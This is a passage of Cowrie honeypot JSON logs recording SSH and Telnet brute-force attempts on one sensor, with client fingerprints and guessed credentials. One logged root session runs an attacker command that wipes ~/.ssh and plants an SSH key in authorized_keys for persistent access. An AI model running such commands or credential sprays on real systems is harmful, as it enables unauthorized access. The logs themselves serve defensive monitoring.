sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:53:58.882328Z","src_ip":"134.199.174.250","session":"cf436d8d0357"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"password1","message":"login attempt [webmaster/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:53:59.670434Z","src_ip":"134.199.174.250","session":"cf436d8d0357"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:00.934533Z","src_ip":"134.199.174.250","session":"cf436d8d0357"}
{"eventid":"cowrie.session.connect","src_ip":"201.182.197.229","src_port":44140,"dst_ip":"1.2.3.4","dst_port":23,"session":"7300fb9a90ab","protocol":"telnet","message":"New connection: 201.182.197.229:44140 (1.2.3.4:23) [session: 7300fb9a90ab]","sensor":"my-vps","timestamp":"2025-09-08T13:54:07.701970Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41522,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a1baa963a0a","protocol":"ssh","message":"New connection: 212.227.235.229:41522 (1.2.3.4:22) [session: 0a1baa963a0a]","sensor":"my-vps","timestamp":"2025-09-08T13:54:20.880895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:54:20.881750Z","src_ip":"212.227.235.229","session":"0a1baa963a0a"}
{"eventid":"cowrie.session.closed","duration":13.240655660629272,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:20.942521Z","src_ip":"201.182.197.229","session":"7300fb9a90ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:54:21.039554Z","src_ip":"212.227.235.229","session":"0a1baa963a0a"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"2025","message":"login attempt [hacker/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:54:22.460934Z","src_ip":"212.227.235.229","session":"0a1baa963a0a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:23.563874Z","src_ip":"212.227.235.229","session":"0a1baa963a0a"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":9261,"dst_ip":"1.2.3.4","dst_port":22,"session":"2083b99d32d8","protocol":"ssh","message":"New connection: 49.247.35.31:9261 (1.2.3.4:22) [session: 2083b99d32d8]","sensor":"my-vps","timestamp":"2025-09-08T13:54:25.159142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:54:25.178082Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:54:25.439238Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.login.success","username":"root","password":"8520","message":"login attempt [root/8520] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:54:26.503494Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:54:27.108193Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:54:27.108865Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:54:27.110025Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:27.385287Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:54:27.937500Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:54:27.938193Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:54:28.203215Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:28.204205Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":34782,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb0000048f2a","protocol":"ssh","message":"New connection: 49.247.35.31:34782 (1.2.3.4:22) [session: fb0000048f2a]","sensor":"my-vps","timestamp":"2025-09-08T13:54:28.485476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:54:28.502240Z","src_ip":"49.247.35.31","session":"fb0000048f2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:54:28.796463Z","src_ip":"49.247.35.31","session":"fb0000048f2a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":38020,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f54b2e09b61","protocol":"ssh","message":"New connection: 134.199.174.250:38020 (1.2.3.4:22) [session: 9f54b2e09b61]","sensor":"my-vps","timestamp":"2025-09-08T13:54:29.659377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:54:29.660279Z","src_ip":"134.199.174.250","session":"9f54b2e09b61"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:54:29.954368Z","src_ip":"49.247.35.31","session":"fb0000048f2a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:54:29.958760Z","src_ip":"134.199.174.250","session":"9f54b2e09b61"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"admin123","message":"login attempt [webmaster/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:54:30.859874Z","src_ip":"134.199.174.250","session":"9f54b2e09b61"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:31.255702Z","src_ip":"49.247.35.31","session":"fb0000048f2a"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":47269,"dst_ip":"1.2.3.4","dst_port":22,"session":"412d9150620c","protocol":"ssh","message":"New connection: 49.247.35.31:47269 (1.2.3.4:22) [session: 412d9150620c]","sensor":"my-vps","timestamp":"2025-09-08T13:54:31.559242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:54:31.580413Z","src_ip":"49.247.35.31","session":"412d9150620c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:54:31.874039Z","src_ip":"49.247.35.31","session":"412d9150620c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:32.159445Z","src_ip":"134.199.174.250","session":"9f54b2e09b61"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:54:33.018140Z","src_ip":"49.247.35.31","session":"412d9150620c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:33.317667Z","src_ip":"49.247.35.31","session":"412d9150620c"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:33.318542Z","src_ip":"49.247.35.31","session":"2083b99d32d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50120,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1946af27236","protocol":"ssh","message":"New connection: 212.227.235.229:50120 (1.2.3.4:22) [session: e1946af27236]","sensor":"my-vps","timestamp":"2025-09-08T13:54:44.926744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:54:44.927493Z","src_ip":"212.227.235.229","session":"e1946af27236"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:54:45.155932Z","src_ip":"212.227.235.229","session":"e1946af27236"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36170,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e10fe110c14","protocol":"ssh","message":"New connection: 212.227.235.229:36170 (1.2.3.4:22) [session: 2e10fe110c14]","sensor":"my-vps","timestamp":"2025-09-08T13:54:46.186882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:54:46.187990Z","src_ip":"212.227.235.229","session":"2e10fe110c14"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58118,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ce19ec9c32f","protocol":"ssh","message":"New connection: 217.72.205.35:58118 (1.2.3.4:22) [session: 3ce19ec9c32f]","sensor":"my-vps","timestamp":"2025-09-08T13:54:46.262469Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:46.263504Z","src_ip":"217.72.205.35","session":"3ce19ec9c32f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:54:46.316254Z","src_ip":"212.227.235.229","session":"2e10fe110c14"}
{"eventid":"cowrie.login.failed","username":"steam","password":"a","message":"login attempt [steam/a] failed","sensor":"my-vps","timestamp":"2025-09-08T13:54:46.745649Z","src_ip":"212.227.235.229","session":"e1946af27236"}
{"eventid":"cowrie.login.failed","username":"pcp","password":"pcp.123","message":"login attempt [pcp/pcp.123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:54:46.867743Z","src_ip":"212.227.235.229","session":"2e10fe110c14"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:47.982553Z","src_ip":"212.227.235.229","session":"e1946af27236"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:54:47.996317Z","src_ip":"212.227.235.229","session":"2e10fe110c14"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":51828,"dst_ip":"1.2.3.4","dst_port":22,"session":"52d363cf730b","protocol":"ssh","message":"New connection: 134.199.174.250:51828 (1.2.3.4:22) [session: 52d363cf730b]","sensor":"my-vps","timestamp":"2025-09-08T13:55:00.634501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:55:00.635417Z","src_ip":"134.199.174.250","session":"52d363cf730b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:55:00.933231Z","src_ip":"134.199.174.250","session":"52d363cf730b"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"1234","message":"login attempt [webmaster/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:55:02.381250Z","src_ip":"134.199.174.250","session":"52d363cf730b"}
